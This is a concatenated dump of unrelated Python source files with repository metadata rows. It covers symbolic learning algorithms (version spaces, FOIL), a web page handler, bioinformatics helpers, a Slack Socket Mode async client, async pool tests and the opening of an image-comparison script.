# ______________________________________________________________________________
def current_best_learning(examples, h, examples_so_far=[]):
""" [Figure 19.2]
The hypothesis is a list of dictionaries, with each dictionary representing
a disjunction."""
if not examples:
return h
e = examples[0]
if is_consistent(e, h):
return current_best_learning(examples[1:], h, examples_so_far + [e])
elif false_positive(e, h):
for h2 in specializations(examples_so_far + [e], h):
h3 = current_best_learning(examples[1:], h2, examples_so_far + [e])
if h3 != 'FAIL':
return h3
elif false_negative(e, h):
for h2 in generalizations(examples_so_far + [e], h):
h3 = current_best_learning(examples[1:], h2, examples_so_far + [e])
if h3 != 'FAIL':
return h3
return 'FAIL'
def specializations(examples_so_far, h):
"""Specialize the hypothesis by adding AND operations to the disjunctions"""
hypotheses = []
for i, disj in enumerate(h):
for e in examples_so_far:
for k, v in e.items():
if k in disj or k == 'GOAL':
continue
h2 = h[i].copy()
h2[k] = '!' + v
h3 = h.copy()
h3[i] = h2
if check_all_consistency(examples_so_far, h3):
hypotheses.append(h3)
shuffle(hypotheses)
return hypotheses
def generalizations(examples_so_far, h):
"""Generalize the hypothesis. First delete operations
(including disjunctions) from the hypothesis. Then, add OR operations."""
hypotheses = []
# Delete disjunctions
disj_powerset = powerset(range(len(h)))
for disjs in disj_powerset:
h2 = h.copy()
for d in reversed(list(disjs)):
del h2[d]
if check_all_consistency(examples_so_far, h2):
hypotheses += h2
# Delete AND operations in disjunctions
for i, disj in enumerate(h):
a_powerset = powerset(disj.keys())
for attrs in a_powerset:
h2 = h[i].copy()
for a in attrs:
del h2[a]
if check_all_consistency(examples_so_far, [h2]):
h3 = h.copy()
h3[i] = h2.copy()
hypotheses += h3
# Add OR operations
if hypotheses == [] or hypotheses == [{}]:
hypotheses = add_or(examples_so_far, h)
else:
hypotheses.extend(add_or(examples_so_far, h))
shuffle(hypotheses)
return hypotheses
def add_or(examples_so_far, h):
"""Add an OR operation to the hypothesis. The AND operations in the disjunction
are generated by the last example (which is the problematic one)."""
ors = []
e = examples_so_far[-1]
attrs = {k: v for k, v in e.items() if k != 'GOAL'}
a_powerset = powerset(attrs.keys())
for c in a_powerset:
h2 = {}
for k in c:
h2[k] = attrs[k]
if check_negative_consistency(examples_so_far, h2):
h3 = h.copy()
h3.append(h2)
ors.append(h3)
return ors
# ______________________________________________________________________________
def version_space_learning(examples):
""" [Figure 19.3]
The version space is a list of hypotheses, which in turn are a list
of dictionaries/disjunctions."""
V = all_hypotheses(examples)
for e in examples:
if V:
V = version_space_update(V, e)
return V
def version_space_update(V, e):
return [h for h in V if is_consistent(e, h)]
def all_hypotheses(examples):
"""Build a list of all the possible hypotheses"""
values = values_table(examples)
h_powerset = powerset(values.keys())
hypotheses = []
for s in h_powerset:
hypotheses.extend(build_attr_combinations(s, values))
hypotheses.extend(build_h_combinations(hypotheses))
return hypotheses
def values_table(examples):
"""Build a table with all the possible values for each attribute.
Returns a dictionary with keys the attribute names and values a list
with the possible values for the corresponding attribute."""
values = defaultdict(lambda: [])
for e in examples:
for k, v in e.items():
if k == 'GOAL':
continue
mod = '!'
if e['GOAL']:
mod = ''
if mod + v not in values[k]:
values[k].append(mod + v)
values = dict(values)
return values
def build_attr_combinations(s, values):
"""Given a set of attributes, builds all the combinations of values.
If the set holds more than one attribute, recursively builds the
combinations."""
if len(s) == 1:
# s holds just one attribute, return its list of values
k = values[s[0]]
h = [[{s[0]: v}] for v in values[s[0]]]
return h
h = []
for i, a in enumerate(s):
rest = build_attr_combinations(s[i+1:], values)
for v in values[a]:
o = {a: v}
for r in rest:
t = o.copy()
for d in r:
t.update(d)
h.append([t])
return h
def build_h_combinations(hypotheses):
"""Given a set of hypotheses, builds and returns all the combinations of the
hypotheses."""
h = []
h_powerset = powerset(range(len(hypotheses)))
for s in h_powerset:
t = []
for i in s:
t.extend(hypotheses[i])
h.append(t)
return h
# ______________________________________________________________________________
def minimal_consistent_det(E, A):
"""Return a minimal set of attributes which give consistent determination"""
n = len(A)
for i in range(n + 1):
for A_i in combinations(A, i):
if consistent_det(A_i, E):
return set(A_i)
def consistent_det(A, E):
"""Check if the attributes(A) is consistent with the examples(E)"""
H = {}
for e in E:
attr_values = tuple(e[attr] for attr in A)
if attr_values in H and H[attr_values] != e['GOAL']:
return False
H[attr_values] = e['GOAL']
return True
# ______________________________________________________________________________
class FOIL_container(FolKB):
"""Hold the kb and other necessary elements required by FOIL."""
def __init__(self, clauses=None):
self.const_syms = set()
self.pred_syms = set()
FolKB.__init__(self, clauses)
def tell(self, sentence):
if is_definite_clause(sentence):
self.clauses.append(sentence)
self.const_syms.update(constant_symbols(sentence))
self.pred_syms.update(predicate_symbols(sentence))
else:
raise Exception("Not a definite clause: {}".format(sentence))
def foil(self, examples, target):
"""Learn a list of first-order horn clauses
'examples' is a tuple: (positive_examples, negative_examples).
positive_examples and negative_examples are both lists which contain substitutions."""
clauses = []
pos_examples = examples[0]
neg_examples = examples[1]
while pos_examples:
clause, extended_pos_examples = self.new_clause((pos_examples, neg_examples), target)
# remove positive examples covered by clause
pos_examples = self.update_examples(target, pos_examples, extended_pos_examples)
clauses.append(clause)
return clauses
def new_clause(self, examples, target):
"""Find a horn clause which satisfies part of the positive
examples but none of the negative examples.
The horn clause is specified as [consequent, list of antecedents]
Return value is the tuple (horn_clause, extended_positive_examples)."""
clause = [target, []]
# [positive_examples, negative_examples]
extended_examples = examples
while extended_examples[1]:
l = self.choose_literal(self.new_literals(clause), extended_examples)
clause[1].append(l)
extended_examples = [sum([list(self.extend_example(example, l)) for example in
extended_examples[i]], []) for i in range(2)]
return (clause, extended_examples[0])
def extend_example(self, example, literal):
"""Generate extended examples which satisfy the literal."""
# find all substitutions that satisfy literal
for s in self.ask_generator(subst(example, literal)):
s.update(example)
yield s
def new_literals(self, clause):
"""Generate new literals based on known predicate symbols.
        Generated literal must share at least one variable with clause"""
share_vars = variables(clause[0])
for l in clause[1]:
share_vars.update(variables(l))
for pred, arity in self.pred_syms:
new_vars = {standardize_variables(expr('x')) for _ in range(arity - 1)}
for args in product(share_vars.union(new_vars), repeat=arity):
if any(var in share_vars for var in args):
# make sure we don't return an existing rule
if not Expr(pred, args) in clause[1]:
yield Expr(pred, *[var for var in args])
def choose_literal(self, literals, examples):
"""Choose the best literal based on the information gain."""
        return max(literals, key=partial(self.gain, examples=examples))
    def gain(self, l, examples):
"""
Find the utility of each literal when added to the body of the clause.
Utility function is:
gain(R, l) = T * (log_2 (post_pos / (post_pos + post_neg)) - log_2 (pre_pos / (pre_pos + pre_neg)))
where:
        pre_pos = number of positive bindings of rule R (= current set of rules)
        pre_neg = number of negative bindings of rule R
        post_pos = number of positive bindings of rule R' (= R U {l})
        post_neg = number of negative bindings of rule R'
        T = number of positive bindings of rule R that are still covered
after adding literal l
"""
pre_pos = len(examples[0])
pre_neg = len(examples[1])
post_pos = sum([list(self.extend_example(example, l)) for example in examples[0]], [])
post_neg = sum([list(self.extend_example(example, l)) for example in examples[1]], [])
        if pre_pos + pre_neg == 0 or len(post_pos) + len(post_neg) == 0:
return -1
        # number of positive examples that are represented in extended_examples
T = 0
for example in examples[0]:
represents = lambda d: all(d[x] == example[x] for x in example)
if any(represents(l_) for l_ in post_pos):
T += 1
        value = T * (log(len(post_pos) / (len(post_pos) + len(post_neg)) + 1e-12, 2) - log(pre_pos / (pre_pos + pre_neg), 2))
return value
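    # Worked instance of the gain formula above (hypothetical counts, for
    # illustration only): with pre_pos = 4, pre_neg = 4, and a literal whose
    # extensions give post_pos = 6, post_neg = 2 while still covering T = 3 of the
    # original positives, gain = 3 * (log2(6/8) - log2(4/8)) ~= 3 * 0.585 ~= 1.75.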
def update_examples(self, target, examples, extended_examples):
"""Add to the kb those examples what are represented in extended_examples
List of omitted examples is returned."""
uncovered = []
for example in examples:
represents = lambda d: all(d[x] == example[x] for x in example)
if any(represents(l) for l in extended_examples):
self.tell(subst(example, target))
else:
uncovered.append(example)
return uncovered
# ______________________________________________________________________________
def check_all_consistency(examples, h):
"""Check for the consistency of all examples under h."""
for e in examples:
if not is_consistent(e, h):
return False
return True
def check_negative_consistency(examples, h):
"""Check if the negative examples are consistent under h."""
for e in examples:
if e['GOAL']:
continue
if not is_consistent(e, [h]):
return False
return True
def disjunction_value(e, d):
"""The value of example e under disjunction d."""
for k, v in d.items():
if v[0] == '!':
# v is a NOT expression
# e[k], thus, should not be equal to v
if e[k] == v[1:]:
return False
elif e[k] != v:
return False
return True
def guess_value(e, h):
"""Guess value of example e under hypothesis h."""
for d in h:
if disjunction_value(e, d):
return True
return False
def is_consistent(e, h):
return e["GOAL"] == guess_value(e, h)
def false_positive(e, h):
return guess_value(e, h) and not e["GOAL"]
def false_negative(e, h):
return e["GOAL"] and not guess_value(e, h)
| 32.529551 | 124 | 0.58968 |
4a1b4bfe508e38bb42a685ab529e852e9f4c7512 | 639 | py | Python | src/controller/HomeContoller.py | SubhasisDutta/NoteBook | 986c73338cdbd8743ffb01c8b91decb0a7178d42 | ["MIT"] | 3 | 2015-05-04T13:52:11.000Z | 2016-05-22T04:00:43.000Z | src/controller/HomeContoller.py | SubhasisDutta/ProfileApp | 986c73338cdbd8743ffb01c8b91decb0a7178d42 | ["MIT"] | 4 | 2015-07-03T12:59:23.000Z | 2015-07-03T13:35:44.000Z | src/controller/HomeContoller.py | SubhasisDutta/ProfileApp | 986c73338cdbd8743ffb01c8b91decb0a7178d42 | ["MIT"] | null | null | null |
import webapp2
import os
from google.appengine.ext.webapp import template
from src.model.WorkModels import Work
class HomePage(webapp2.RequestHandler):
def get(self):
self.response.headers["Content-Type"]="text/html"
publishedWork=Work.gql("WHERE publish=True ORDER BY order ")
template_values = {
'pageTitle':"Subhasis Dutta ",
'works':publishedWork
}
path=os.path.join(os.path.dirname(__file__),'../../template/index_old.html')
page=template.render(path,template_values)
self.response.out.write(page)
| 37.588235 | 84 | 0.621283 |
4a1b4c9ac7eb1bf19248b7e29754906cca9ab59b | 41 | py | Python | min_to_sec.py | rfaria/misc | c68426d97b8ee635ffe0642f986e584367be68e5 | ["MIT"] | null | null | null | min_to_sec.py | rfaria/misc | c68426d97b8ee635ffe0642f986e584367be68e5 | ["MIT"] | null | null | null | min_to_sec.py | rfaria/misc | c68426d97b8ee635ffe0642f986e584367be68e5 | ["MIT"] | null | null | null |
def convert(minutes):
return minutes*60
| 13.666667 | 21 | 0.780488 |
4a1b4d0b01d78c2a7b6f13a4c447bc568f9bd297 | 13,240 | py | Python | utils/cbook.py | zhaotao1987/jcvi | 748fcdbbd1db5eb8a4ccfe19eec6072006ffd501 | ["BSD-2-Clause"] | 2 | 2019-04-05T21:01:45.000Z | 2021-02-13T11:38:10.000Z | utils/cbook.py | zhaotao1987/jcvi | 748fcdbbd1db5eb8a4ccfe19eec6072006ffd501 | ["BSD-2-Clause"] | null | null | null | utils/cbook.py | zhaotao1987/jcvi | 748fcdbbd1db5eb8a4ccfe19eec6072006ffd501 | ["BSD-2-Clause"] | 1 | 2019-01-21T15:49:24.000Z | 2019-01-21T15:49:24.000Z |
"""
Useful recipes from various internet sources (thanks)
mostly decorator patterns
"""
import os.path as op
import re
import sys
import logging
import functools
from collections import defaultdict
class memoized(object):
"""
Decorator that caches a function's return value each time it is called.
If called later with the same arguments, the cached value is returned, and
not re-evaluated.
Taken from recipe (http://wiki.python.org/moin/PythonDecoratorLibrary)
"""
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args):
try:
return self.cache[args]
except KeyError:
value = self.func(*args)
self.cache[args] = value
return value
except TypeError:
# uncachable -- for instance, passing a list as an argument.
# Better to not cache than to blow up entirely.
return self.func(*args)
def __repr__(self):
"""Return the function's docstring."""
return self.func.__doc__
def __get__(self, obj, objtype):
"""Support instance methods."""
return functools.partial(self.__call__, obj)
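# Minimal usage sketch (hypothetical function, for illustration only): results are
# cached per argument tuple, so repeated calls with the same n reuse the stored
# value instead of recursing again.
#
#   @memoized
#   def fib(n):
#       return n if n < 2 else fib(n - 1) + fib(n - 2)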
def inspect(item, maxchar=80):
"""
Inspect the attributes of an item.
"""
for i in dir(item):
try:
member = str(getattr(item, i))
if maxchar and len(member) > maxchar:
member = member[:maxchar] + "..."
except:
member = "[ERROR]"
print >> sys.stderr, "{}: {}".format(i, member)
def timeit(func):
"""
<http://www.zopyx.com/blog/a-python-decorator-for-measuring-the-execution-time-of-methods>
"""
import time
def timed(*args, **kw):
ts = time.time()
result = func(*args, **kw)
te = time.time()
msg = "{0}{1} {2:.2f}s".format(func.__name__, args, te - ts)
logging.debug(msg)
return result
return timed
def depends(func):
"""
Decorator to perform check on infile and outfile. When infile is not present, issue
warning, and when outfile is present, skip function calls.
"""
from jcvi.apps.base import need_update, listify
infile = "infile"
outfile = "outfile"
def wrapper(*args, **kwargs):
assert outfile in kwargs, \
"You need to specify `outfile=` on function call"
if infile in kwargs:
infilename = listify(kwargs[infile])
for x in infilename:
assert op.exists(x), \
"The specified infile `{0}` does not exist".format(x)
outfilename = kwargs[outfile]
if need_update(infilename, outfilename):
return func(*args, **kwargs)
else:
msg = "File `{0}` exists. Computation skipped." \
.format(outfilename)
logging.debug(msg)
outfilename = listify(outfilename)
for x in outfilename:
assert op.exists(x), \
"Something went wrong, `{0}` not found".format(x)
return outfilename
return wrapper
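# Minimal usage sketch (hypothetical file names, for illustration only): the wrapped
# function only runs when `outfile` is missing or older than `infile`.
#
#   @depends
#   def compress(infile=None, outfile=None):
#       ...  # write outfile from infile
#
#   compress(infile="reads.fastq", outfile="reads.fastq.gz")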
"""
Functions that make text formatting easier.
"""
class Registry (defaultdict):
def __init__(self, *args, **kwargs):
super(Registry, self).__init__(list, *args, **kwargs)
def iter_tag(self, tag):
for key, ts in self.items():
if tag in ts:
yield key
def get_tag(self, tag):
return list(self.iter_tag(tag))
def count(self, tag):
return sum(1 for x in self.iter_tag(tag))
def update_from(self, filename):
from jcvi.formats.base import DictFile
d = DictFile(filename)
for k, v in d.items():
self[k].append(v)
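# Minimal usage sketch (hypothetical keys and tags, for illustration only):
#
#   reg = Registry()
#   reg["geneA"].append("curated")
#   reg["geneB"].append("predicted")
#   reg.get_tag("curated")    # -> ["geneA"]
#   reg.count("predicted")    # -> 1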
class SummaryStats (object):
def __init__(self, a, dtype=None, title=None):
import numpy as np
self.data = a = np.array(a, dtype=dtype)
self.min = a.min()
self.max = a.max()
self.size = a.size
self.mean = np.mean(a)
self.sd = np.std(a)
self.median = np.median(a)
self.sum = a.sum()
self.title = title
a.sort()
self.firstq = a[self.size / 4]
self.thirdq = a[self.size * 3 / 4]
self.p1 = a[int(self.size * .025)]
self.p2 = a[int(self.size * .975)]
if dtype == "int":
self.mean = int(self.mean)
self.sd = int(self.sd)
self.median = int(self.median)
def __str__(self):
s = self.title + ": " if self.title else ""
s += "Min={0} Max={1} N={2} Mean={3} SD={4} Median={5} Sum={6}".\
format(self.min, self.max, self.size,
self.mean, self.sd, self.median,
self.sum)
return s
def todict(self, quartile=False):
d = {
"Min": self.min, "Max": self.max,
"Mean": self.mean, "Median": self.median
}
if quartile:
d.update({
"1st Quartile": self.firstq, "3rd Quartile": self.thirdq
})
return d
def tofile(self, filename):
fw = open(filename, "w")
for x in self.data:
print >> fw, x
fw.close()
logging.debug("Array of size {0} written to file `{1}`.".\
format(self.size, filename))
class AutoVivification(dict):
"""
Implementation of perl's autovivification feature.
Thanks to <http://stackoverflow.com/questions/651794/whats-the-best-way-to-initialize-a-dict-of-dicts-in-python>
"""
def __getitem__(self, item):
try:
return dict.__getitem__(self, item)
except KeyError:
value = self[item] = type(self)()
return value
def enumerate_reversed(sequence):
"""
Perform reverse enumeration, returning an iterator with decrementing
index/position values
Source: http://stackoverflow.com/questions/529424/traverse-a-list-in-reverse-order-in-python
"""
for index in reversed(xrange(len(sequence))):
yield index, sequence[index]
def percentage(a, b, precision=1, mode=0):
"""
>>> percentage(100, 200)
'100 of 200 (50.0%)'
"""
pct = "{0:.{1}f}%".format(a * 100. / b, precision)
a, b = thousands(a), thousands(b)
if mode == 0:
return "{0} of {1} ({2})".format(a, b, pct)
elif mode == 1:
return "{0} ({1})".format(a, pct)
return pct
def thousands(x):
"""
>>> thousands(12345)
'12,345'
"""
import locale
try:
locale.setlocale(locale.LC_ALL, "en_US.utf8")
except Exception:
locale.setlocale(locale.LC_ALL, "en_US.UTF-8")
finally:
s = '%d' % x
groups = []
while s and s[-1].isdigit():
groups.append(s[-3:])
s = s[:-3]
return s + ','.join(reversed(groups))
return locale.format('%d', x, True)
SUFFIXES = {1000: ['', 'Kb', 'Mb', 'Gb', 'Tb', 'Pb', 'Eb', 'Zb'],
1024: ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB']}
def human_size(size, a_kilobyte_is_1024_bytes=False, precision=1, target=None):
'''Convert a file size to human-readable form.
Keyword arguments:
size -- file size in bytes
    a_kilobyte_is_1024_bytes -- if True, use multiples of 1024
                                if False (the default), use multiples of 1000
Returns: string
Credit: <http://diveintopython3.org/your-first-python-program.html>
>>> print(human_size(1000000000000, True))
931.3GiB
>>> print(human_size(1000000000000))
1.0Tb
>>> print(human_size(300))
300.0
'''
if size < 0:
raise ValueError('number must be non-negative')
multiple = 1024 if a_kilobyte_is_1024_bytes else 1000
for suffix in SUFFIXES[multiple]:
if target:
if suffix == target:
break
size /= float(multiple)
else:
if size >= multiple:
size /= float(multiple)
else:
break
return '{0:.{1}f}{2}'.format(size, precision, suffix)
def autoscale(bp, optimal=6):
"""
>>> autoscale(150000000)
20000000
>>> autoscale(97352632)
10000000
"""
slen = str(bp)
tlen = slen[0:2] if len(slen) > 1 else slen[0]
precision = len(slen) - 2 # how many zeros we need to pad?
bp_len_scaled = int(tlen) # scale bp_len to range (0, 100)
tick_diffs = [(x, abs(bp_len_scaled / x - optimal)) for x in [1, 2, 5, 10]]
best_stride, best_tick_diff = min(tick_diffs, key=lambda x: x[1])
while precision > 0:
best_stride *= 10
precision -= 1
return best_stride
def gene_name(st, exclude=("ev",), sep="."):
"""
    Helper functions in the BLAST filtering to get rid of alternative splicings.
This is ugly, but different annotation groups are inconsistent with respect
to how the alternative splicings are named. Mostly it can be done by removing
the suffix, except for ones in the exclude list.
"""
if any(st.startswith(x) for x in exclude):
sep = None
return st.rsplit(sep, 1)[0]
def seqid_parse(seqid, sep=["-", "_"], stdpf=True):
"""
This function tries to parse seqid (1st col in bed files)
return prefix, numeric id, and suffix, for example:
>>> seqid_parse('chr1_random')
('Chr', '1', '_random')
>>> seqid_parse('AmTr_v1.0_scaffold00001', '', stdpf=False)
('AmTr_v1.0_scaffold', '00001', '')
>>> seqid_parse('AmTr_v1.0_scaffold00001')
('Sca', '00001', '')
>>> seqid_parse('PDK_30s1055861')
('C', '1055861', '')
>>> seqid_parse('PDK_30s1055861', stdpf=False)
('PDK', '1055861', '')
>>> seqid_parse("AC235758.1", stdpf=False)
('AC', '235758.1', '')
"""
if "mito" in seqid or "chloro" in seqid:
return (seqid, "", "")
numbers = re.findall(r'\d+\.*\d*', seqid)
if not numbers:
return (seqid, "", "")
id = numbers[-1]
lastnumi = seqid.rfind(id)
suffixi = lastnumi + len(id)
suffix = seqid[suffixi:]
if sep is None:
sep = [""]
elif type(sep) == str:
sep = [sep]
prefix = seqid[: lastnumi]
if not stdpf:
sep = "|".join(sep)
atoms = re.split(sep, prefix)
if len(atoms) == 1:
prefix = atoms[0]
else:
prefix = atoms[-2]
else: # use standard prefix
if re.findall("chr", prefix, re.I):
prefix = "Chr"
elif re.findall("sca", prefix, re.I):
prefix = "Sca"
elif re.findall("supercontig", prefix, re.I):
prefix = "SCg"
elif re.findall("ctg|contig", prefix, re.I):
prefix = "Ctg"
elif re.findall("BAC", prefix, re.I):
prefix = "BAC"
else:
prefix = "C"
return prefix, id, suffix
def fixChromName(name, orgn="medicago"):
"""
Convert quirky chromosome names encountered in different
release files, which are very project specific, into a more
general format.
For example, in Medicago
Convert a seqid like
`Mt3.5.1_Chr1` to `chr1`
`Mt3.5_Chr3` to `chr3`
`chr01_pseudomolecule_IMGAG` to `chr1`
Some examples from Maize
Convert a seqid like
`chromosome:AGPv2:2:1:237068873:1` to `2`
Special cases
`chromosome:AGPv2:mitochondrion:1:569630:1` to `Mt`
`chromosome:AGPv2:chloroplast:1:140384:1` to `Pt`
"""
import re
mtr_pat1 = re.compile(r"Mt[0-9]+\.[0-9]+[\.[0-9]+]{0,}_([a-z]+[0-9]+)")
mtr_pat2 = re.compile(r"([A-z0-9]+)_[A-z]+_[A-z]+")
zmays_pat = re.compile(r"[a-z]+:[A-z0-9]+:([A-z0-9]+):[0-9]+:[0-9]+:[0-9]+")
zmays_sub = { 'mitochondrion' : 'Mt', 'chloroplast' : 'Pt' }
if orgn == "medicago":
for mtr_pat in (mtr_pat1, mtr_pat2):
match = re.search(mtr_pat, name)
if match:
n = match.group(1)
n = n.replace("0", "")
name = re.sub(mtr_pat, n, name)
elif orgn == "maize":
match = re.search(zmays_pat, name)
if match:
n = match.group(1)
name = re.sub(zmays_pat, n, name)
if name in zmays_sub:
name = zmays_sub[name]
return name
def fill(text, delimiter="", width=70):
"""
Wrap text with width per line
"""
texts = []
for i in xrange(0, len(text), width):
t = delimiter.join(text[i:i + width])
texts.append(t)
return "\n".join(texts)
def tile(lt, width=70, gap=1):
"""
Pretty print list of items.
"""
from jcvi.utils.iter import grouper
max_len = max(len(x) for x in lt) + gap
items_per_line = max(width / max_len, 1)
lt = [x.rjust(max_len) for x in lt]
g = list(grouper(lt, items_per_line, fillvalue=""))
return "\n".join("".join(x) for x in g)
def uniqify(L):
"""
Uniqify a list, maintains order (the first occurrence will be kept).
"""
seen = set()
nL = []
for a in L:
if a in seen:
continue
nL.append(a)
seen.add(a)
return nL
if __name__ == '__main__':
import doctest
doctest.testmod()
| 27.525988 | 116 | 0.556647 |
4a1b4d8b2b8cdedf5e7b989a5c3e8d3256e7454b | 6,278 | py | Python | slack_sdk/socket_mode/async_client.py | jans-forks/python-slackclient | ff798cbe00ead477ce98efa8468cb2c1c99635f3 | ["MIT"] | 2 | 2021-09-11T06:18:24.000Z | 2021-10-30T14:00:48.000Z | slack_sdk/socket_mode/async_client.py | QAtest-Inc/python-slack-sdk | 61f098311adbd6d2904f51541cf5d8bf42c83168 | ["MIT"] | 1 | 2021-09-12T23:26:37.000Z | 2021-09-12T23:26:37.000Z | slack_sdk/socket_mode/async_client.py | QAtest-Inc/python-slack-sdk | 61f098311adbd6d2904f51541cf5d8bf42c83168 | ["MIT"] | 1 | 2021-09-13T10:07:14.000Z | 2021-09-13T10:07:14.000Z |
import asyncio
import json
import logging
from asyncio import Queue, Lock
from asyncio.futures import Future
from logging import Logger
from typing import Dict, Union, Any, Optional, List, Callable, Awaitable
from slack_sdk.errors import SlackApiError
from slack_sdk.socket_mode.async_listeners import (
AsyncWebSocketMessageListener,
AsyncSocketModeRequestListener,
)
from slack_sdk.socket_mode.request import SocketModeRequest
from slack_sdk.socket_mode.response import SocketModeResponse
from slack_sdk.web.async_client import AsyncWebClient
class AsyncBaseSocketModeClient:
logger: Logger
web_client: AsyncWebClient
app_token: str
wss_uri: str
auto_reconnect_enabled: bool
trace_enabled: bool
closed: bool
connect_operation_lock: Lock
message_queue: Queue
message_listeners: List[
Union[
AsyncWebSocketMessageListener,
Callable[
["AsyncBaseSocketModeClient", dict, Optional[str]], Awaitable[None]
],
]
]
socket_mode_request_listeners: List[
Union[
AsyncSocketModeRequestListener,
Callable[["AsyncBaseSocketModeClient", SocketModeRequest], Awaitable[None]],
]
]
async def issue_new_wss_url(self) -> str:
try:
response = await self.web_client.apps_connections_open(
app_token=self.app_token
)
return response["url"]
except SlackApiError as e:
if e.response["error"] == "ratelimited":
# NOTE: ratelimited errors rarely occur with this endpoint
delay = int(e.response.headers.get("Retry-After", "30")) # Tier1
self.logger.info(f"Rate limited. Retrying in {delay} seconds...")
await asyncio.sleep(delay)
# Retry to issue a new WSS URL
return await self.issue_new_wss_url()
else:
# other errors
self.logger.error(f"Failed to retrieve WSS URL: {e}")
raise e
async def is_connected(self) -> bool:
return False
async def connect(self):
raise NotImplementedError()
async def disconnect(self):
raise NotImplementedError()
async def connect_to_new_endpoint(self, force: bool = False):
try:
await self.connect_operation_lock.acquire()
if self.trace_enabled:
self.logger.debug(
"For reconnection, the connect_operation_lock was acquired"
)
if force or not await self.is_connected():
self.wss_uri = await self.issue_new_wss_url()
await self.connect()
finally:
if self.connect_operation_lock.locked() is True:
self.connect_operation_lock.release()
if self.trace_enabled:
self.logger.debug(
"The connect_operation_lock for reconnection was released"
)
async def close(self):
self.closed = True
await self.disconnect()
async def send_message(self, message: str):
raise NotImplementedError()
async def send_socket_mode_response(
self, response: Union[Dict[str, Any], SocketModeResponse]
):
if isinstance(response, SocketModeResponse):
await self.send_message(json.dumps(response.to_dict()))
else:
await self.send_message(json.dumps(response))
async def enqueue_message(self, message: str):
await self.message_queue.put(message)
if self.logger.level <= logging.DEBUG:
queue_size = self.message_queue.qsize()
self.logger.debug(
f"A new message enqueued (current queue size: {queue_size})"
)
async def process_messages(self):
try:
while not self.closed:
try:
await self.process_message()
except Exception as e:
self.logger.exception(f"Failed to process a message: {e}")
except asyncio.CancelledError:
if self.trace_enabled:
self.logger.debug("The running process_messages task is now cancelled")
raise
async def process_message(self):
raw_message = await self.message_queue.get()
if raw_message is not None:
message: dict = {}
if raw_message.startswith("{"):
message = json.loads(raw_message)
_: Future[None] = asyncio.ensure_future(
self.run_message_listeners(message, raw_message)
)
async def run_message_listeners(self, message: dict, raw_message: str) -> None:
type, envelope_id = message.get("type"), message.get("envelope_id")
if self.logger.level <= logging.DEBUG:
self.logger.debug(
f"Message processing started (type: {type}, envelope_id: {envelope_id})"
)
try:
if message.get("type") == "disconnect":
await self.connect_to_new_endpoint(force=True)
return
for listener in self.message_listeners:
try:
await listener(self, message, raw_message)
except Exception as e:
self.logger.exception(f"Failed to run a message listener: {e}")
if len(self.socket_mode_request_listeners) > 0:
request = SocketModeRequest.from_dict(message)
if request is not None:
for listener in self.socket_mode_request_listeners:
try:
await listener(self, request)
except Exception as e:
self.logger.exception(
f"Failed to run a request listener: {e}"
)
except Exception as e:
self.logger.exception(f"Failed to run message listeners: {e}")
finally:
if self.logger.level <= logging.DEBUG:
self.logger.debug(
f"Message processing completed (type: {type}, envelope_id: {envelope_id})"
)
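# Minimal usage sketch (illustrative only; a concrete subclass supplies connect(),
# disconnect() and send_message()): a request listener registered on the client
# normally acknowledges each SocketModeRequest by envelope_id before doing real work.
#
#   async def ack_listener(client: AsyncBaseSocketModeClient, req: SocketModeRequest):
#       await client.send_socket_mode_response(
#           SocketModeResponse(envelope_id=req.envelope_id))
#
#   client.socket_mode_request_listeners.append(ack_listener)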
| 36.929412 | 94 | 0.590953 |
4a1b4da8befbf6356d11567d50a322599417d4bb | 1,038 | py | Python | pipedream/tests/async_test.py | tgecho/pipedream | 2e619d0ff72ae0f5e01620611a09f47c52127200 | ["BSD-2-Clause"] | 1 | 2015-06-10T20:28:30.000Z | 2015-06-10T20:28:30.000Z | pipedream/tests/async_test.py | tgecho/pipedream | 2e619d0ff72ae0f5e01620611a09f47c52127200 | ["BSD-2-Clause"] | null | null | null | pipedream/tests/async_test.py | tgecho/pipedream | 2e619d0ff72ae0f5e01620611a09f47c52127200 | ["BSD-2-Clause"] | null | null | null |
def do_stuff(one=1, two=2):
return one + two
def test_call(pool):
result = pool.do(do_stuff)
assert result == 3
def test_call_with_args(pool):
result = pool.do(do_stuff, 2, 3)
assert result == 5
def test_call_with_kwargs(pool):
result = pool.do(do_stuff, one=2, two=3)
assert result == 5
def test_call_with_both(pool):
result = pool.do(do_stuff, 2, two=3)
assert result == 5
def break_things():
return 1/0
def handle_breakage(func):
try:
func()
except ZeroDivisionError as exc:
return exc
def test_exception_handling(pool):
result = pool.do(handle_breakage, break_things)
assert isinstance(result, ZeroDivisionError)
def one_func():
return 1
def two_func(a):
return a + 1
def test_interplay(combination):
    # Ensure that each async backend can handle receiving a future from any other type of backend.
one, two = combination
one_future = one.do(one_func)
two_future = two.do(two_func, one_future)
assert two_future == 2
| 18.872727 | 98 | 0.677264 |
4a1b4e60e8723e94544582c95db53b0eafc4501f | 203 | py | Python | joinstring/joinstring/__init__.py | RDIL/bluejay | 7a2354b61c28b7b2a47b96b55a2908944a07edfb | ["MIT"] | 3 | 2020-01-15T04:17:20.000Z | 2022-03-05T17:49:51.000Z | joinstring/joinstring/__init__.py | RDIL/bluejay | 7a2354b61c28b7b2a47b96b55a2908944a07edfb | ["MIT"] | null | null | null | joinstring/joinstring/__init__.py | RDIL/bluejay | 7a2354b61c28b7b2a47b96b55a2908944a07edfb | ["MIT"] | null | null | null |
"""Performance-friendly string combining utility."""
def joinstring(string1: str, string2: str) -> str:
"""Performance-friendly string combining function."""
return "".join([string1, string2])
| 29 | 57 | 0.704433 |
4a1b505050706b8467d301511276256aeb219803 | 2,592 | py | Python | gibson/core/channels/archive/compare_img.py | rainprob/GibsonEnv | e0d0bc614713c676cb303bf9f11ca6a98713e0e0 | ["MIT"] | 731 | 2018-02-26T18:35:05.000Z | 2022-03-23T04:00:09.000Z | gibson/core/channels/archive/compare_img.py | Shubodh/GibsonEnv | 38274874d7c2c2a87efdb6ee529f2b366c5219de | ["MIT"] | 111 | 2018-04-19T01:00:22.000Z | 2022-03-18T17:43:50.000Z | gibson/core/channels/archive/compare_img.py | Shubodh/GibsonEnv | 38274874d7c2c2a87efdb6ee529f2b366c5219de | ["MIT"] | 153 | 2018-02-27T04:38:40.000Z | 2022-03-28T08:10:39.000Z |
from PIL import Image
import numpy as np
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
#opengl_path = "/home/jerry/Pictures/point_0_view_2_domain_fixatedpose.png"
